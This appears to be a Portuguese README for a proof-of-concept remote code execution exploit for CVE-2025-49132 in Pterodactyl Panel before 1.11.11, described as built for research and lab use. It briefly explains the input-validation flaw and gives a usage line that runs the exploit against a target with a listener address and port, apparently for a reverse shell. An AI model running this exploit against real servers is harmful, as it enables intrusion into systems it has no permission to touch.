
Este script explora a vulnerabilidade de execução remota de código no Pterodactyl Panel < 1.11.11
Este repositório contém uma Prova de Conceito (PoC) para CVE-2025-49132, uma vulnerabilidade de Execução Remota de Código (RCE) que afeta o Pterodactyl Panel < 1.11.11 Este PoC foi desenvolvido e testado em um ambiente de laboratório controlado para fins de pesquisa e educação.
A vulnerabilidade origina-se da validação insuficiente de entrada controlada pelo usuário em um manipulador de requisições, o que permite interação não intencional com o backend. Sob certas condições, isso pode levar à execução remota de comandos.
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>